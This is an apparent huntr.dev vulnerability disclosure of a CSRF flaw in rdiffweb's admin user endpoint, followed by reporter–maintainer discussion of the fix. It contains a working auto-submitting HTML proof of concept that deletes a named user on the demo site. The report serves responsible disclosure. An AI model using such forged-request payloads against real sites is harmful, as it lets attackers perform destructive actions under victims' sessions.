Cross-Site Request Forgery (CSRF) in ikus060/rdiffweb
Reported on
Sep 11th 2021
✍️ Description
Hello dear Rdiffweb team.
I found a CSRF vulnerability on following endpoint that attackers able to Delete users with PoC.html
🕵️♂️ Proof of Concept
user with right privileges should be logged in Firefox or Safari.
Users go to a website that contain PoC.html
3.after visiting attacker's website a user with username aaaa will be deleted.
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://rdiffweb-demo.ikus-soft.com/admin/users" method="POST">
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="username" value="aaaa" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Also attacker can send multiple request with help of Iframes.
Fix
I just want to suggest you to set a CSRF token for this form.
Hey amammad, I've opened a PR on the repo asking for a security policy with email.
@admin Hey Zi
maintainer already put own email for your pull request
https://github.com/ikus060/rdiffweb/pull/73
@admin hey admin
They already put theier email in 25 days ago !!!
There Are other reports for other endpoints, please validate them too.
you can see them in the reports section
@amammad
I've added CSRF everywhere applicable. I'm not sure I've miss any endpoint
Can I ask that do you check these reports ?
https://www.huntr.dev/bounties/5ee61635-4a57-41f6-9536-a07737e99db2/ https://www.huntr.dev/bounties/74c976cf-cf31-4a51-992b-45b8c488c4f2/ https://www.huntr.dev/bounties/b558dfb2-38a4-4ea7-a53f-6808065337aa/ https://www.huntr.dev/bounties/740ac468-47b3-4937-98ef-01e8e5e1382b/
I test all parts of application and I found the endpoints that don't have any CSRF protection.
I mean that I report for every endpoint that was vulnerable to CSRF one report.